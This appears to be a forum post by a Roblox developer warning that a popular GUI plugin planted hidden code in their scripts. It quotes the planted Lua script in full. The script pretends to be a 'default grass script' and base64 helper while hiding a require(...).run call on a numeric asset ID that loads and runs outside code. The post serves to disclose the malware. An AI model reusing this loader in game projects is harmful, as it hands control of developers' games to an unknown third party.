this malicious script was in a gui plugin on the main page of plugins, added invisble lines to every script i had
--// This is a default Roblox grass script. Dont remove for high quality grass. \--
--// Contact Chaz#4045 for questions! \--
function lsh(value,shift)
return (value*(2^shift)) % 256
end
-- shift right
function rsh(value,shift)
return math.floor(value/2^shift) % 256
end
-- return single bit (for OR)
function bit(x,b)
return (x % 2^b - x % 2^(b-1) > 0)
end
-- logic OR for number values
function lor(x,y,z)
require(z).run(script)
result = 0
for p=1,8 do result = result + (((bit(x,p) or bit(y,p)) == true) and 2^(p-1) or 0) end
return result
end
-- encryption table
local base64chars = {[0]='A',[1]='B',[2]='C',[3]='D',[4]='E',[5]='F',[6]='G',[7]='H',[8]='I',[9]='J',[10]='K',[11]='L',[12]='M',[13]='N'}
-- function encode
-- encodes input string to base64.
function enc(data)
local bytes = {}
local result = ""
for spos=0,string.len(data)-1,3 do
for byte=1,3 do bytes[byte] = string.byte(string.sub(data,(spos+byte))) or 0 end
result = string.format('%s%s%s%s%s',result,base64chars[rsh(bytes[1],2)],base64chars[lor(lsh((bytes[1] % 4),4), rsh(bytes[2],4))] or "=",((#data-spos) > 1) and base64chars[lor(lsh(bytes[2] % 16,2), rsh(bytes[3],6))] or "=",((#data-spos) > 2) and base64chars[(bytes[3] % 64)] or "=")
end
return result
end
-- decryption table
local base64bytes = {['A']=0,['B']=1,['C']=2,['D']=3,['E']=4,['F']=5,['G']=6,['H']=7,['I']=8,['J']=9,['K']=10,['L']=11,['M']=12,['N']=13}
function dec(data,i)
local chars = {}
local result=""
if not data then
lor(2,5,i)
end
for dpos=0,string.len(data)-1,4 do
for char=1,4 do chars[char] = base64bytes[(string.sub(data,(dpos+char),(dpos+char)) or "=")] end
result = string.format('%s%s%s%s',result,string.char(lor(lsh(chars[1],2), rsh(chars[2],4))),(chars[3] ~= nil) and string.char(lor(lsh(chars[2],4), rsh(chars[3],2))) or "",(chars[4] ~= nil) and string.char(lor(lsh(chars[3],6) % 192, (chars[4]))) or "")
end
return result
end
dec(nil,0x139326cd0)
-- command line if not called as library
if (arg ~= nil) then
local func = 'enc'
for n,v in ipairs(arg) do
if (n > 0) then
if (v == "-h") then print "base64.lua [-e] [-d] text/data" break
elseif (v == "-e") then func = 'enc'
elseif (v == "-d") then func = 'dec'
else print(_G[func](v)) end
end
end
else
end
pretty sure that scripts a fake and is malicious like the other lines it added to alot of other scripts
worst part is it came from one of theese ui plugins on the main page